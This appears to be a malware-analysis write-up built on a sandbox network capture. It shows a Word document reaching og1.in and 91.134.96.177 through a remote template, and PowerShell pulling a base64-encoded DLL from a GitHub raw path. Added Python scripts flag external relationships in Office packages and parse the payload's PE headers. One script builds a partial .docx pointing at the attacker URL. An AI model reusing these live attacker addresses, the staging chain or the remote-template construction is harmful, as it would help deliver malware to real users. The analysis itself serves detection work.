    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: og1.in
    Connection: Keep-Alive
2024-09-30 14:24:21 UTC | 935 | IN | HTTP/1.1 302 Found
    Date: Mon, 30 Sep 2024 14:24:21 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 196
    Connection: close
    location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
    strict-transport-security: max-age=15552000; includeSubDomains
    vary: Accept
    x-content-type-options: nosniff
    x-dns-prefetch-control: off
    x-download-options: noopen
    x-frame-options: SAMEORIGIN
    x-xss-protection: 0
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pw1zTNOP1giK2dA7oP3Nly%2FoaOfBE7g4K2wa8jx7cFk8e8lz%2FOM7MNBNGrh%2FALwUJvEMxZwoRCXRoPyYn7tw09NgWhC7bmVZrAHrtPgWZBN%2BRkOUaJ3oVgc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8cb4e0426dad32e4-EWR
2024-09-30 14:24:21 UTC | 196 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 39 31 2e 31 33 34 2e 39 36 2e 31 37 37 2f 38 30 2f 75 63 2f 73 65 65 74 68 65 64 6f 6d 61 69 6e 64 73 6b 69 6c 6c 74 65 63 68 6e 6f 6c 6f 67 79 77 68 69 63 68 63 72 65 61 74 65 64 6e 69 63 65 70 65 72 73 6f 6e 65 6e 74 69 72 65 6c 69 66 65 74 6f 67 65 74 62 6d 65 62 61 63 6b 77 69 74 68 6e 65 77 74 68 69 6e 67 73 77 69 74 68 69 63 68 68 6f 6e 65 73 74 74 68 69 6e 67 73 61 6c 77 61 79 73 77 61 6e 74 6f 62 65 5f 5f 5f 5f 5f 5f 73 65 69 73 63 75 74 65 62 61 62 79 67 69 72 6c 65 76 65 72 2e 64 6f 63
    Data Ascii: Found. Redirecting to http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49170 | 172.67.216.244 | 443 | 3272 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-09-30 14:24:23 UTC | 132 | OUT | HEAD /S7UYq0 HTTP/1.1
  User-Agent: Microsoft Office Existence Discovery
  Host: og1.in
  Content-Length: 0
  Connection: Keep-Alive
2024-09-30 14:24:24 UTC | 943 | IN | HTTP/1.1 302 Found
  Date: Mon, 30 Sep 2024 14:24:24 GMT
  Content-Type: text/plain; charset=utf-8
  Content-Length: 196
  Connection: close
  location: http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
  strict-transport-security: max-age=15552000; includeSubDomains
  vary: Accept
  x-content-type-options: nosniff
  x-dns-prefetch-control: off
  x-download-options: noopen
  x-frame-options: SAMEORIGIN
  x-xss-protection: 1; mode=block
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBqwUmz3kwUh2xdYdtnIUwHkdj7ZhmTIQFwhKqs8y6fYYDZHYXEqTVAoYi%2FF2xTGstgYi6BcQxiLOb%2FRCij68cbLxXZ1TMnMXQ4z8wV1tNZwcy1DWx9OM2A%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8cb4e051cbf31780-EWR
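
The HEAD /S7UYq0 request in session 6 is the probe Word sends (User-Agent "Microsoft Office Existence Discovery") while resolving a relationship whose target lies outside the document package, before it fetches that target; the 302 then steers the fetch to a .doc on 91.134.96.177. The script below is an added example and not part of the Joe Sandbox report or of the sample: it builds a constructed, minimal .docx in memory whose word/_rels/settings.xml.rels carries an attachedTemplate relationship with TargetMode="External" (the URL https://og1.in/S7UYq0 is assembled from the Host header and request path of session 6; the function names and the sample package are this example's own), then lists every external relationship in a package, separating those Office resolves on its own when the file is opened from hyperlinks that need a click.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# External targets of these relationship types are resolved by Office when the
# document is opened, without user interaction. attachedTemplate is the
# remote-template vector that produces the HEAD/GET pair seen in session 6.
AUTO_FETCHED_TYPES = {
    OFFICE_REL + "attachedTemplate",
    OFFICE_REL + "oleObject",
    OFFICE_REL + "frame",
    OFFICE_REL + "image",
}
HYPERLINK_TYPE = OFFICE_REL + "hyperlink"


def find_external_relationships(docx_bytes):
    """Return every TargetMode="External" relationship found in any .rels part.

    Each hit records the part it came from, the relationship Id, the short
    type name, the target URL and whether Office fetches it automatically.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "")
                hits.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rtype.rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                    "auto_fetched": rtype in AUTO_FETCHED_TYPES,
                })
    return hits


def build_sample_docx(template_url):
    """Constructed sample: the two .rels parts needed to exercise the check.

    It is not a complete, openable document (no [Content_Types].xml or
    document.xml); only the relationship parts matter here.
    """
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%sattachedTemplate" '
        'Target="%s" TargetMode="External"/>'
        '</Relationships>' % (REL_NS, OFFICE_REL, template_url)
    )
    document_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="%s" '
        'Target="https://example.invalid/" TargetMode="External"/>'
        '</Relationships>' % (REL_NS, OFFICE_REL, HYPERLINK_TYPE)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("https://og1.in/S7UYq0")
    for hit in find_external_relationships(sample):
        flag = "AUTO-FETCHED" if hit["auto_fetched"] else "on-click"
        print("%-12s %s %s %s -> %s" % (flag, hit["part"], hit["id"],
                                         hit["type"], hit["target"]))
```

For a real sample, read the file bytes and pass them to find_external_relationships; the same check covers the .rels parts of .xlsx and .pptx packages. An internal styles relationship is ignored, the hyperlink is reported but marked as needing a click, and the external attachedTemplate is the one that makes Word reach out the moment the document opens.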


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49172 | 185.199.109.133 | 443 | 3952 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-30 14:24:33 UTC | 128 | OUT | GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
  Host: raw.githubusercontent.com
  Connection: Keep-Alive
2024-09-30 14:24:33 UTC | 904 | IN | HTTP/1.1 200 OK
  Connection: close
  Content-Length: 2935468
  Cache-Control: max-age=300
  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
  Content-Type: text/plain; charset=utf-8
  ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
  Strict-Transport-Security: max-age=31536000
  X-Content-Type-Options: nosniff
  X-Frame-Options: deny
  X-XSS-Protection: 1; mode=block
  X-GitHub-Request-Id: 482C:31934A:562630:5C3669:66FAB4A0
  Accept-Ranges: bytes
  Date: Mon, 30 Sep 2024 14:24:33 GMT
  Via: 1.1 varnish
  X-Served-By: cache-nyc-kteb1890088-NYC
  X-Cache: MISS
  X-Cache-Hits: 0
  X-Timer: S1727706273.273986,VS0,VE137
  Vary: Authorization,Accept-Encoding,Origin
  Access-Control-Allow-Origin: *
  Cross-Origin-Resource-Policy: cross-origin
  X-Fastly-Request-ID: 7ebd9e96ea824740a6bddda325def95fa166dfa5
  Expires: Mon, 30 Sep 2024 14:29:33 GMT
  Source-Age: 0
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
  Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
  Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
  Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
  Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
  Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
  Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
  Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
  Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
  Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
2024-09-30 14:24:33 UTC | 1378 | IN | Data Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
  Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA
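
Session 7 shows powershell.exe fetching a 2935468-byte file served as text/plain from raw.githubusercontent.com, and the first Data Ascii line of the body begins with TVqQAAMAAAAEAAAA: that is base64 of the bytes 4D 5A 90 00, an MZ header, so the "text file" is a Windows executable encoded for a later decode step. GitHub serves every raw file with that content type, so a filter on Content-Type cannot tell this response apart from a legitimate script; the body has to be inspected. The script below is an added example and not part of the report or the sample: it embeds the 252 base64 characters the report displays (the rest of the body is not on the page), decodes the complete groups, and parses the DOS, COFF and optional headers so that a responder can characterise the payload from the capture alone. Function names are this example's own.

```python
import base64
import datetime
import re
import struct

# First 255 characters of the response body, copied from the report's
# "Data Ascii" view of session 7. Only complete 4-character groups can be
# decoded (63 groups = 189 bytes); the remaining ~2.9 MB are not on the page.
SAMPLE_BODY = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA"            # DOS header, bytes 0-26
    + "A" * 44                                        # bytes 27-59 are zero
    + "gAAAAA4fug4AtAnNIbgBTM0h"                      # e_lfanew = 0x80, stub code
    + "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAA"
    + "TAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA"
)

IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "ARM64"}
MAGIC_NAMES = {0x10B: "PE32", 0x20B: "PE32+"}
_NOT_B64 = re.compile(r"[^A-Za-z0-9+/=]")


def decode_base64_prefix(text):
    """Decode as much of a possibly truncated base64 body as is complete."""
    clean = _NOT_B64.sub("", text)
    clean = clean[: len(clean) - len(clean) % 4]   # drop the dangling group
    return base64.b64decode(clean, validate=True)


def parse_pe_headers(data):
    """Parse the DOS, COFF and leading optional-header fields of a PE prefix.

    Returns None when the bytes are not a PE; fields that lie past the end of
    a truncated buffer are left out rather than guessed.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, stamp, _, _, _, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    info = {
        "e_lfanew": e_lfanew,
        "dos_stub": b"This program cannot be run in DOS mode" in data[0x40:e_lfanew],
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": stamp,
        "compiled_utc": datetime.datetime.fromtimestamp(
            stamp, datetime.timezone.utc).isoformat(),
        "characteristics": chars,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
    }
    opt = e_lfanew + 24
    if len(data) >= opt + 4:
        magic, major, minor = struct.unpack_from("<HBB", data, opt)
        info["magic"] = MAGIC_NAMES.get(magic, hex(magic))
        info["linker"] = "%d.%d" % (major, minor)
    if info.get("magic") == "PE32" and len(data) >= opt + 32:
        info["entry_point"] = struct.unpack_from("<I", data, opt + 16)[0]
        info["image_base"] = struct.unpack_from("<I", data, opt + 28)[0]
    return info


def analyse_body(text):
    """Convenience wrapper: base64 text -> parsed header dict (or None)."""
    return parse_pe_headers(decode_base64_prefix(text))


if __name__ == "__main__":
    for key, value in analyse_body(SAMPLE_BODY).items():
        print("%-16s %s" % (key, hex(value) if isinstance(value, int) else value))
```

On the captured prefix the parser reports e_lfanew 0x80, Machine i386, 3 sections, a PE32 optional header with linker version 48.0 (a value typical of binaries emitted by the .NET Roslyn compilers), a link timestamp of 2024-09-26 16:42:43 UTC (four days before the analysis), and Characteristics 0x210E, in which bit 0x2000 (IMAGE_FILE_DLL) is set: the file is a DLL rather than an .exe, consistent with a payload meant to be loaded in-process by a PowerShell stage rather than written to disk and executed. The 1378-byte window cuts the optional header short, so section names and the CLR data directory are out of reach. Matching on the TVqQ prefix catches plain base64 only; a loader that reverses or re-encodes the blob needs its decode step mirrored first.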


